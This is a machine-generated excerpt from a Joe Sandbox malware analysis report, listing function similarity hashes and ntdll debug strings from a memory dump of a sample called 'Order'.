• Instruction ID: 0192c98f9a5761d19a16dd8771b7ce85b645779d660877fbb82bdc08eddf560e
• Opcode Fuzzy Hash: 6b80217fd712f9756393a85653a4f55b4adf13546f63082962f0d27da9a967dc
• Instruction Fuzzy Hash: 05900225212504030605B55C0708507408A97D6351355C025F1059550CD62689615225
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fa49ae86cead1630175447be0955127b0cca027230010367f62603c741d372a2
• Instruction ID: e2d5a1a6a13c2f335221cde8566fb97f36db5d0d00211575453c563934e37fc5
• Opcode Fuzzy Hash: fa49ae86cead1630175447be0955127b0cca027230010367f62603c741d372a2
• Instruction Fuzzy Hash: 9E900225222504020645B55C060850B4489A7D7351395C019F145A590CC62689655325
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 11c8b6be647d3e2100ff7e97cb0a068accfe07c91dc1e2d639c2d323008cf3b1
• Instruction ID: 21c6acc9ac5f16c626464969d4fbeea964de491e45d24198618eda2edfe7ec4a
• Opcode Fuzzy Hash: 11c8b6be647d3e2100ff7e97cb0a068accfe07c91dc1e2d639c2d323008cf3b1
• Instruction Fuzzy Hash: 8C90023124250802D641715C4408606404DA7D1241F95C016A0468554EC65A8B56AB65
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 637488612ba3ae66fe4e20e74ca439c2cb0a572ad65818e84d1ec3e357b943bb
• Instruction ID: 58d03e9c751a5d37823052b02246a3a833ffbf8a1a21f8b62a3abf943e281b4a
• Opcode Fuzzy Hash: 637488612ba3ae66fe4e20e74ca439c2cb0a572ad65818e84d1ec3e357b943bb
• Instruction Fuzzy Hash: 8D900221243545525A45B15C4408507804AA7E1241795C016A1458950CC52B9956D725
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 09eebc48a708453c5f923e69f4ed8361d7cc4fe9c3f1b0a99ba4f6e928761dd2
• Instruction ID: 1f839154bd7e5149d5ef44955bf594d2bc03a9e345e42147b5bce28a8ba189d7
• Opcode Fuzzy Hash: 09eebc48a708453c5f923e69f4ed8361d7cc4fe9c3f1b0a99ba4f6e928761dd2
• Instruction Fuzzy Hash: 2090022921350402D680715C540C60A404997D2202F95D419A0059558CC91A89695325
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9e1739d064af110382d7bd7f9d25da0b40217d8f04656dc74f45d42a9fa34675
• Instruction ID: 496ba9f708576c881c20d3fae045fbb1ea0ef6adaf4138e04b8d6460f18f5096
• Opcode Fuzzy Hash: 9e1739d064af110382d7bd7f9d25da0b40217d8f04656dc74f45d42a9fa34675
• Instruction Fuzzy Hash: 8490022120654842D600755C540CA06404997D1205F55D015A10A8595DC63A8951A235
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 304771c5e256cabdc666a827c001688df6b96b7538684f53c6b0ab5ddbe85d1f
• Instruction ID: 3067bbce087b589abfc1377a82300c94b30870b1ceaee3bd65c05b1f312eb75c
• Opcode Fuzzy Hash: 304771c5e256cabdc666a827c001688df6b96b7538684f53c6b0ab5ddbe85d1f
• Instruction Fuzzy Hash: FA90022130250403D640715C541C6068049E7E2301F55D015E0458554CD91A89565326
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7c785581f12fd7429fb8142cbca86edf2c1020aec359d35507fd9f285c5c3f17
                                                                                                                                    • Instruction ID: 93f5d6aceea0bb1ff89ac5979a677a535db77512912dc15d32491d468e801c1e
                                                                                                                                    • Opcode Fuzzy Hash: 7c785581f12fd7429fb8142cbca86edf2c1020aec359d35507fd9f285c5c3f17
                                                                                                                                    • Instruction Fuzzy Hash: 9190023120250802D600759C540C646404997E1301F55D015A5068555EC66A89916235
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 11a993caac701af5e63f7048958689c1e72c9bd6f5dea3bdf91c34cf520d5240
                                                                                                                                    • Instruction ID: b5f623617930c263f7806f982d2494613faaad15cea089765b15208676f337e3
                                                                                                                                    • Opcode Fuzzy Hash: 11a993caac701af5e63f7048958689c1e72c9bd6f5dea3bdf91c34cf520d5240
                                                                                                                                    • Instruction Fuzzy Hash: 0D90022160650802D640715C541C706405997D1201F55D015A0068554DC65E8B5567A5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: afb08cc5455f3bf5f7661182dd52bd09a8c7fd1c7c9fe7b8ab80cfd5ed57478b
                                                                                                                                    • Instruction ID: e9903794a9a480cb896340374a5dc7c194dadf1083ef84ccf4471578e959c331
                                                                                                                                    • Opcode Fuzzy Hash: afb08cc5455f3bf5f7661182dd52bd09a8c7fd1c7c9fe7b8ab80cfd5ed57478b
                                                                                                                                    • Instruction Fuzzy Hash: 5690023120250803D600715C550C707404997D1201F55D415A0468558DD65B89516225
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8500e2feb4f18526b734164136c5ee95a16bf6d5d44034bf3c0190f9580bfeae
                                                                                                                                    • Instruction ID: 08d960f7ac365a818951149621c77d15453d3692c835dcf1a7ab7d4c520b887a
                                                                                                                                    • Opcode Fuzzy Hash: 8500e2feb4f18526b734164136c5ee95a16bf6d5d44034bf3c0190f9580bfeae
                                                                                                                                    • Instruction Fuzzy Hash: 6990023120250C42D600715C4408B46404997E1301F55C01AA0168654DC61AC9517625
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c372fee35af2ccd65f3d0fb328e2ec5f874b99fa85adf9e470268617f8bbc970
                                                                                                                                    • Instruction ID: 008c5f01bbfbb33a4df3e95c4e5683b95f9e544f545744f63d24427533edbfea
                                                                                                                                    • Opcode Fuzzy Hash: c372fee35af2ccd65f3d0fb328e2ec5f874b99fa85adf9e470268617f8bbc970
                                                                                                                                    • Instruction Fuzzy Hash: 9B90023120290802D600715C481870B404997D1302F55C015A11A8555DC62A89516675
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8636f520a54791ee73c4a40baf2075f01ab8adb761dfb4940a6eef6badf36da7
                                                                                                                                    • Instruction ID: c68ca02023b61e0d1b4f1d18de9bf36804055bb76274ba00699a1a86842fa205
                                                                                                                                    • Opcode Fuzzy Hash: 8636f520a54791ee73c4a40baf2075f01ab8adb761dfb4940a6eef6badf36da7
                                                                                                                                    • Instruction Fuzzy Hash: 19900221602504424640716C88489068049BBE2211755C125A09DC550DC55E89655769
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 027af7b843b52d92152b4b210eef3ddbdc50c95c5ed8269ed6fbbc1bfd342f9f
                                                                                                                                    • Instruction ID: e890f903d4b607e7d49825edff591b58f1bc00d5449cae06ba5184fa47a9af10
                                                                                                                                    • Opcode Fuzzy Hash: 027af7b843b52d92152b4b210eef3ddbdc50c95c5ed8269ed6fbbc1bfd342f9f
                                                                                                                                    • Instruction Fuzzy Hash: 6190023120290802D600715C480C747404997D1302F55C015A51A8555EC66AC9916635
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9dd0a27983a86130cd47536b795e0a2ac00ad1c4adb5ec9ae2e320c8d59c60d4
                                                                                                                                    • Instruction ID: 2f61f581e35051fd9a90e234fdef191266dcb4e28edd6d83bad6f492bfc956cb
                                                                                                                                    • Opcode Fuzzy Hash: 9dd0a27983a86130cd47536b795e0a2ac00ad1c4adb5ec9ae2e320c8d59c60d4
                                                                                                                                    • Instruction Fuzzy Hash: F6900221212D0442D700756C4C18B07404997D1303F55C119A0198554CC91A89615625
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9c574972f68f37948f2cc0ca12d619d223d9997ef6cc17a50e1b78ad3de013e8
                                                                                                                                    • Instruction ID: 9bc044dd39fa6b5999f90547b991fd07408f4ee099c011c45441289514f60d16
                                                                                                                                    • Opcode Fuzzy Hash: 9c574972f68f37948f2cc0ca12d619d223d9997ef6cc17a50e1b78ad3de013e8
                                                                                                                                    • Instruction Fuzzy Hash: EE90026134250842D600715C4418B064049D7E2301F55C019E10A8554DC61ECD52622A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 640a48c9910c74a430f2bfbad92b2ebaefc4fefb4b82e6cdf1d64e296a8218f2
                                                                                                                                    • Instruction ID: 678ec15efd0fe428a1bf19fe8f89cc460a6b9a936cb4dca33afc8a346bfb8a0c
                                                                                                                                    • Opcode Fuzzy Hash: 640a48c9910c74a430f2bfbad92b2ebaefc4fefb4b82e6cdf1d64e296a8218f2
                                                                                                                                    • Instruction Fuzzy Hash: F490026121250442D604715C4408706408997E2201F55C016A2198554CC52E8D615229
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9bee59e6a14efba33c6594ff4c859080ebc56f0218d4edc77c9d36f1d9ee3de9
                                                                                                                                    • Instruction ID: 3c6c38a2ad735bc68576ce30af4bdf09efd06217e143e984e4c6dac3cae28ddd
                                                                                                                                    • Opcode Fuzzy Hash: 9bee59e6a14efba33c6594ff4c859080ebc56f0218d4edc77c9d36f1d9ee3de9
                                                                                                                                    • Instruction Fuzzy Hash: A890022160250902D601715C4408616404E97D1241F95C026A1068555ECA2A8A92A235
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a2ed54bda7ad3036af9b7dd3a905d2dc029a7e8291b9150a1af1fdc57520187e
                                                                                                                                    • Instruction ID: 60674abf1b9a36a5d4855f5019013d04af9acda2b6c803c33c36bfdcce84870d
                                                                                                                                    • Opcode Fuzzy Hash: a2ed54bda7ad3036af9b7dd3a905d2dc029a7e8291b9150a1af1fdc57520187e
                                                                                                                                    • Instruction Fuzzy Hash: 4E90027120250802D640715C4408746404997D1301F55C015A50A8554EC65E8ED56769
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cd9c3ac54b7e8debbda896d21ea7c8c5aa3588a7e39ecf87a38c298ab2e104be
• Instruction ID: 89dc8afa898a7d7a9c4117e99b9a9157db9290c8a814b727e0e409dcb19e3ad9
• Opcode Fuzzy Hash: cd9c3ac54b7e8debbda896d21ea7c8c5aa3588a7e39ecf87a38c298ab2e104be
• Instruction Fuzzy Hash: 6D90026120290803D640755C4808607404997D1302F55C015A20A8555ECA2E8D516239

Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d33b116caec23ef52018c3b63203c760e4c01ccea5a51dcde48a99424eba862b
• Instruction ID: 7d4aa8072f8991027eb19367de1b94265cfb7171595446c6ca9537d4e3897c01
• Opcode Fuzzy Hash: d33b116caec23ef52018c3b63203c760e4c01ccea5a51dcde48a99424eba862b
• Instruction Fuzzy Hash: 1390022130250802D602715C4418606404DD7D2345F95C016E1468555DC62A8A53A236

Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6308cebcc6b9992b91eb5660421cb02637a2daf5b5db241aac93d7bf8eec07a
• Instruction ID: 404ee5d7bfb28afae1f515282ec67c55da9306a52ae85912293b97c2356f1636
• Opcode Fuzzy Hash: e6308cebcc6b9992b91eb5660421cb02637a2daf5b5db241aac93d7bf8eec07a
• Instruction Fuzzy Hash: 3490022124250C02D640715C8418707404AD7D1601F55C015A0068554DC61B8A6567B5

Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8b3b2471d02ad810f10b33d3ce0dea29d1d5f9c81f5bceb0606fd2c79225ac03
• Instruction ID: e94fa8547aa8d8f08af2ddd6542439c5f4e2006ff09a683e7ff62dff8785f56d
• Opcode Fuzzy Hash: 8b3b2471d02ad810f10b33d3ce0dea29d1d5f9c81f5bceb0606fd2c79225ac03
• Instruction Fuzzy Hash: F790022120294842D640725C4808B0F814997E2202F95C01DA419A554CC91A89555725

Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 115e87ef8a22753ddf0204e63fd66d62fd4ac006795c915f651651ebe92909d0
• Instruction ID: 178454be628e69beb4db45428f73ee3f94ab0c5cb45cf3098d55223adf341a87
• Opcode Fuzzy Hash: 115e87ef8a22753ddf0204e63fd66d62fd4ac006795c915f651651ebe92909d0
• Instruction Fuzzy Hash: 7C90022124655502D650715C44086168049B7E1201F55C025A0858594DC55A89556325

Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ef60cc94c2bf41323400bd2fd445598e074cc4fb917c84344ea61e490401721
• Instruction ID: 0ea4412de5017c651c59a66909f20a1b42b865173f0a2a71bb02fc852feeb4a8
• Opcode Fuzzy Hash: 2ef60cc94c2bf41323400bd2fd445598e074cc4fb917c84344ea61e490401721
• Instruction Fuzzy Hash: 02900231203505429A40725C5808A4E814997E2302B95D419A0059554CC91989615325

Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5b80c6a1509e88832c5898ca82ffdd8bcf71ae9badf3c83b8403b8dfb47c2d01
• Instruction ID: f769d972d6dbd4f0219a4a09b437c9211457dec019ddee9a7a6027b6b2f50d5f
• Opcode Fuzzy Hash: 5b80c6a1509e88832c5898ca82ffdd8bcf71ae9badf3c83b8403b8dfb47c2d01
• Instruction Fuzzy Hash: 4C90023520250802DA10715C5808646408A97D1301F55D415A0468558DC65989A1A225

Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction ID: c26a46f40155d0af60f41735fc008435baf0626200742d2b07df4f600b439870
• Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
• Instruction Fuzzy Hash:

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: b8905a6b86698fa9d1a5f658e03e25706355d167ec257ff177edf528c8e43843
• Instruction ID: 390d1a32aab457465cdb5ae54ecb711d8e1bf31f59bb65c8478bce4d04e9a6b4
• Opcode Fuzzy Hash: b8905a6b86698fa9d1a5f658e03e25706355d167ec257ff177edf528c8e43843
• Instruction Fuzzy Hash: BA51E6B2A00116BFDF11EF9D898097EFBBCBB492417148229E46DD7641D374DE50C7A0

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: ab05092538fb9f4825adad3969982f3a25b8cbd642c0ab672d95c800443dc9be
• Instruction ID: 555dbddcc55781c2a2806daa82d5c0ac47ce8434ca06aaff7b9179cf276e9c9a
• Opcode Fuzzy Hash: ab05092538fb9f4825adad3969982f3a25b8cbd642c0ab672d95c800443dc9be
• Instruction Fuzzy Hash: 60510875A04645BFCB30DF9DC890A7FBBFCEB84201B04885DE69EC7641D6B4DA408760

Strings
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 019B4655
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 019B4725
• Execute=1, xrefs: 019B4713
• ExecuteOptions, xrefs: 019B46A0
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 019B46FC
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 019B4742
• CLIENT(ntdll): Processing section info %ws..., xrefs: 019B4787
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: 67e4b62eb891f40f15d4b78c02bdd4747570e9d25e0a48832f0fa75a634fd821
• Instruction ID: 678da6a5d91050a58fdad9f718e64edb17abdaa8d98dd56f23585a82f30275d3
• Opcode Fuzzy Hash: 67e4b62eb891f40f15d4b78c02bdd4747570e9d25e0a48832f0fa75a634fd821
• Instruction Fuzzy Hash: D2514A31A0021ABAEF15EBE8DC89FE977ADEF54700F0404A9E60DA7181E771AA41CF51

Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
• Instruction ID: 2b60ea38d8d5cd75749d68889903c71291bd8688a6fa69eb295e60b023c5524e
• Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
• Instruction Fuzzy Hash: EB020571508342AFD305DF28C590A6BBBF5FFC8710F448A2DB9898B268DB71E945CB52

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction ID: e28631a731677418fd59a607b61958cdba4464bee8b80712f67dada553acef22
• Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
• Instruction Fuzzy Hash: 8D81E130E1124A8EEF25BE6CC850BFEBFB9AF45321F1C4519D86BA7691C7349840CB51

APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
• Opcode ID: 03001704eb11f1a234e18842bfecde862564183c72e5a0465cedc8c3e1972c84
• Instruction ID: 52c091a87252181e2fd5cb249b20f67aad219eb6599134a9382153af957730a2
• Opcode Fuzzy Hash: 03001704eb11f1a234e18842bfecde862564183c72e5a0465cedc8c3e1972c84
• Instruction Fuzzy Hash: E621337AE10119ABDB11DF69DC40AEE7BEDAF94654F44011AEA19D3240E730DA018BA5

Strings
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019B02BD
• RTL: Re-Waiting, xrefs: 019B031E
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019B02E7
Memory Dump Source
• Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1910000_Order.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
• Opcode ID: a534f2947b23445643396524a72d672326a21046aadbff796a643177506e5183
• Instruction ID: 05a6c95f6e8dd8a40757bc1b9ef26e12eae00b4e2b7749b96fef3de745f64237
• Opcode Fuzzy Hash: a534f2947b23445643396524a72d672326a21046aadbff796a643177506e5183
• Instruction Fuzzy Hash: 5FE1EF306087429FD725CF2CD994B6ABBE8BF84314F180A5DF5A98B2E1D734D844CB52

Strings
• RTL: Re-Waiting, xrefs: 019B7BAC
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 019B7B7F
• RTL: Resource at %p, xrefs: 019B7B8E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1905093933.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_1910000_Order.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                    • API String ID: 0-871070163
                                                                                                                                    • Opcode ID: 4e4f7c1abed498543ad77b65ac1231864bd924e6d6a0c55e498bc19396882b3b
                                                                                                                                    • Instruction ID: 071465c7b84c4a6fcc1977e491ff12eceaed701049369b6f0b8c437e1d3a79a8
                                                                                                                                    • Opcode Fuzzy Hash: 4e4f7c1abed498543ad77b65ac1231864bd924e6d6a0c55e498bc19396882b3b
                                                                                                                                    • Instruction Fuzzy Hash: 6F41E2317047069FD724DE29C940B6AB7E9EF89B11F000A1DF95EDB280DB31E5058B91
                                                                                                                                    APIs
                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019B728C
                                                                                                                                    Strings
                                                                                                                                    • RTL: Re-Waiting, xrefs: 019B72C1
